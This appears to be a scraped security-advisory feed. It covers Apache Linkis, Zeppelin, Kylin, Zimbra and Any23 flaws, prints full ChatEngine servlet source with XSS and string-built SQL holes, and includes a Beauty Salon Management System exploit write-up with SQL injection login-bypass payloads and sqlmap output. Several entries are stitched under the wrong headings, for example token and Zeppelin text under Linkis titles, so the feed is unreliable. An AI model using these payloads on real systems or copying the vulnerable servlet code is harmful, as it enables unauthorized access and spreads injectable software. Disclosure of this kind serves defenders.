In Apache Linkis <=1.3.1, due to the Manager module engineConn material upload does not check the zip path, This is a Zip Slip issue, which will lead to a potential RCE vulnerability.


We recommend users upgrade the version of Linkis to version 1.3.2.





**Apache Linkis Zip Slip issue**

Critical severity GitHub Reviewed Published Jul 6, 2023 to the GitHub Advisory Database • Updated Jul 6, 2023

GHSA-pj5j-w7mw-w797: Apache Linkis Zip Slip issue

In Apache Linkis <=1.3.1, due to the default token generated by Linkis Gateway deployment being too simple, it is easy for attackers to obtain the default token for the attack. Generation rules should add random values.

We recommend users upgrade the version of Linkis to version 1.3.2 And modify the default token value. You can refer to Token authorization.

**Apache Linkis Authentication Bypass vulnerability**

Critical severity GitHub Reviewed Published Jul 6, 2023 to the GitHub Advisory Database • Updated Jul 6, 2023

GHSA-4x5h-xmv4-99wx: Apache Linkis Authentication Bypass vulnerability

The improper Input Validation vulnerability in `Move folder to Trash` feature of Apache Zeppelin allows an attacker to delete the arbitrary files. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.

**Apache Zeppelin Improper Input Validation vulnerability**

Moderate severity GitHub Reviewed Published Jul 6, 2023 to the GitHub Advisory Database • Updated Jul 6, 2023

GHSA-gm67-h5wr-w3cv: Apache Zeppelin Improper Input Validation vulnerability

Kylin's cube designer function has a command injection vulnerability when overwriting system parameters in the configuration overwrites menu. RCE can be implemented by closing the single quotation marks around the parameter value of “-- conf=” to inject any operating system command into the command line parameters. This vulnerability affects Kylin 2 version 2.6.5 and earlier, Kylin 3 version 3.1.2 and earlier, and Kylin 4 version 4.0.1 and earlier.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-24697

**Apache Kylin vulnerable to remote code execution**

Critical severity GitHub Reviewed Published Jul 6, 2023 to the GitHub Advisory Database • Updated Jul 6, 2023

**Package**

maven org.apache.kylin:kylin-core-common (Maven)

**Affected versions**

< 4.0.2

maven org.apache.kylin:kylin-server-base (Maven)

maven org.apache.kylin:kylin-spark-project (Maven)

Published to the GitHub Advisory Database

Jul 6, 2023

GHSA-ppxx-m926-g569: Apache Kylin vulnerable to remote code execution

An issue in Zimbra Collaboration ZCS v.8.8.15 and v.9.0 allows an attacker to execute arbitrary code via the sfdc_preauth.jsp component.

CVE-2023-29382: Security Center - Zimbra :: Tech Center

Cross Site Scripting (XSS) vulnerability in textMessage field in /src/chatbotapp/LoginServlet.java in wliang6 ChatEngine commit fded8e710ad59f816867ad47d7fc4862f6502f3e, allows attackers to execute arbitrary code.

package chatbotapp; import java.io.IOException; import java.io.PrintWriter; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.Statement; import javax.servlet.ServletException; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; /\*\* \* ChatBotApp \* @author Winnie Oct 11, 2016 \* LoginServlet.java \*/ @WebServlet(urlPatterns = "/userLogin") public class LoginServlet extends HttpServlet{ public String username; HttpSession session; protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{ response.setContentType("text/html;charset=UTF-8"); username = request.getParameter("username"); PrintWriter out = response.getWriter(); try{ session = request.getSession(); session.setAttribute("username", request.getParameter("username")); out.println("<html> <head> <body bgcolor=\\"#0099B8\\"\> <meta http-equiv=\\"Content-Type\\" content=\\"text/html; charset=UTF-8\\"\> <title>Chat Room</title> </head>"); out.println("<meta http-equiv=\\"Content-Type\\" content=\\"text/html; charset=UTF-8\\"\> <center>"); out.println("<h2>Hi "); out.println(username); out.println("<br> Welcome to Chat Engine "); out.println("</h2><br><hr>"); out.println(" <body>"); out.println(" <form name=\\"chatWindow\\" action=\\"chatWindow\\"\>"); out.println("Message: <input type=\\"text\\" name=\\"txtMsg\\" value=\\"\\" /><input type=\\"submit\\" value=\\"Send\\" name=\\"cmdSend\\"/>"); out.println("<br><br> <a href=\\"chatWindow\\"\>Refresh Chat Room</a>"); out.println("<br> <br>"); out.println("Messages in Chat Box:"); out.println("<br><br>"); out.println("<textarea readonly=\\"readonly\\" name=\\"textMessage\\" rows=\\"20\\" cols=\\"60\\"\>"); //Retrieve messages from database try{ Class.forName("org.apache.derby.jdbc.EmbeddedDriver"); //driver java.sql.Connection con = DriverManager.getConnection("jdbc:derby:/Users/Winnie/MyDatabase;create=true", "", ""); Statement statement = con.createStatement(); ResultSet resultSet = statement.executeQuery("select \*from WEBCHATDATABASE.MYTABLE"); while(resultSet.next()){ String messages = resultSet.getString(1)+ " >> " + resultSet.getString(2); out.println(messages); } //statement.executeUpdate("TRUNCATE TABLE WEBCHATDATABASE.MYTABLE"); con.close(); } catch(Exception e){ System.out.println(e.getMessage()); } out.println("</textarea>"); out.println("<hr>"); out.println("</form>"); out.println("</body"); out.println("</html>"); } catch(Exception e){ System.out.println(e); } } @Override protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { response.setContentType("text/html;charset=UTF-8"); request.getRequestDispatcher("/WEB-INF/lib/index.jsp").forward(request, response); } @Override protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { processRequest(request, response); } }

CVE-2023-30321: ChatEngine/src/chatbotapp/LoginServlet.java at fded8e710ad59f816867ad47d7fc4862f6502f3e · wliang6/ChatEngine

Cross Site Scripting (XSS) vulnerability in textMessage field in /src/chatbotapp/chatWindow.java in wliang6 ChatEngine commit fded8e710ad59f816867ad47d7fc4862f6502f3e, allows attackers to execute arbitrary code.

package chatbotapp; import java.io.IOException; import java.io.PrintWriter; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.Statement; import javax.servlet.ServletException; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; /\*\* \* ChatBotApp \* @author Winnie Oct 11, 2016 \* chatWindow.java \*/ @WebServlet(urlPatterns = {"/chatWindow"}) public class chatWindow extends HttpServlet{ String username, tempName; HttpSession session; protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{ response.setContentType("text/html;charset=UTF-8"); try(PrintWriter out = response.getWriter()){ String message = request.getParameter("txtMsg"); String username = session.getAttribute("username").toString(); //request.getRequestDispatcher("/WEB-INF/lib/chatbox.jsp").forward(request, response); out.println("<html> <head> <body bgcolor=\\"#0099B8\\"\> <meta http-equiv=\\"Content-Type\\" content=\\"text/html; charset=UTF-8\\"\> <title>Chat Room</title> </head>"); out.println("<meta http-equiv=\\"Content-Type\\" content=\\"text/html; charset=UTF-8\\"\> <center>"); out.println("<h2>Hi "); out.println(username); out.println("<br> Welcome to Chat Engine "); out.println("</h2><br><hr>"); out.println(" <body>"); out.println(" <form name=\\"chatWindow\\" action=\\"chatWindow\\"\>"); out.println("Message: <input type=\\"text\\" name=\\"txtMsg\\" value=\\"\\" /><input type=\\"submit\\" value=\\"Send\\" name=\\"cmdSend\\"/>"); out.println("<br><br> <a href=\\"chatWindow\\"\>Refresh Chat Room</a>"); out.println("<br> <br>"); out.println("Messages in Chat Box:"); out.println("<br><br>"); out.println("<textarea readonly=\\"readonly\\" name=\\"textMessage\\" rows=\\"20\\" cols=\\"60\\"\>"); if(request.getParameter("txtMsg") != null){ try{ Class.forName("org.apache.derby.jdbc.EmbeddedDriver"); java.sql.Connection con = DriverManager.getConnection("jdbc:derby:/Users/Winnie/MyDatabase;create=true", "", ""); Statement st = con.createStatement(); String sql = "insert into WEBCHATDATABASE.MYTABLE values ('"+username+"','"+message+"')"; st.executeUpdate(sql); st.execute("commit"); } catch(Exception e){ System.out.println(e.getMessage()); } } //Retrieve messages from database try{ Class.forName("org.apache.derby.jdbc.EmbeddedDriver"); //driver java.sql.Connection con = DriverManager.getConnection("jdbc:derby:/Users/Winnie/MyDatabase;create=true", "", ""); Statement statement = con.createStatement(); ResultSet resultSet = statement.executeQuery("select \*from WEBCHATDATABASE.MYTABLE"); while(resultSet.next()){ String messages = resultSet.getString(1)+ " >> " + resultSet.getString(2); out.println(messages); } //statement.executeUpdate("TRUNCATE TABLE WEBCHATDATABASE.MYTABLE"); con.close(); } catch(Exception e){ System.out.println(e.getMessage()); } out.println("</textarea>"); out.println("<hr>"); out.println("</form>"); out.println("</body"); out.println("</html>"); } } @Override protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{ session = request.getSession(); if(username != null){ tempName = username; } processRequest(request, response); } @Override protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{ processRequest(request, response); } }

CVE-2023-30320: ChatEngine/src/chatbotapp/chatWindow.java at master · wliang6/ChatEngine

Beauty Salon Management System version 1.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: Beauty Salon Management System v1.0 - SQLi  
# Date of found: 04/07/2023  
# Exploit Author: Fatih Nacar  
# Version: V1.0  
# Tested on: Windows 10  
# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/>  
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/  
# CWE: CWE-89

Vulnerability Description -

Beauty Salon Management System: V1.0, developed by Campcodes, has been  
found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability  
allows an attacker to manipulate login authentication with the SQL queries  
and bypass authentication. The system fails to properly validate  
user-supplied input in the username and password fields during the login  
process, enabling an attacker to inject malicious SQL code. By exploiting  
this vulnerability, an attacker can bypass authentication and gain  
unauthorized access to the system.

Steps to Reproduce -

The following steps outline the exploitation of the SQL Injection  
vulnerability in Beauty Salon Management System V1.0:

1. Open the admin login page by accessing the URL:  
http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php

2. In the username and password fields, insert the following SQL Injection  
payload shown inside brackets to bypass authentication for usename  
parameter:

{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374  
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign  
In}

3.Execute the SQL Injection payload.

As a result of successful exploitation, the attacker gains unauthorized  
access to the system and is logged in with administrative privileges.

Sqlmap results:

POST parameter 'username' is vulnerable. Do you want to keep testing the  
others (if any)? [y/N] y

sqlmap identified the following injection point(s) with a total of 793  
HTTP(s) requests:

---

Parameter: username (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)

Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374  
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign  
In

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--  
rvYF&password=test&login=Sign In

---

[15:58:56] [INFO] the back-end DBMS is MySQL

web application technology: PHP 8.2.4, Apache 2.4.56

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

Beauty Salon Management System 1.0 SQL Injection

Use of TikaEncodingDetector in Apache Any23 can cause excessive memory usage.

**Apache Any23 vulnerable to excessive memory usage**

Moderate severity GitHub Reviewed Published Jul 5, 2023 to the GitHub Advisory Database • Updated Jul 6, 2023

GHSA-2gpr-j5vj-wvh2: Apache Any23 vulnerable to excessive memory usage

** UNSUPPORTED WHEN ASSIGNED ** Use of TikaEncodingDetector in Apache Any23 can cause excessive memory usage.

**Email display mode:**

Modern rendering  
Legacy rendering

Tag

#apache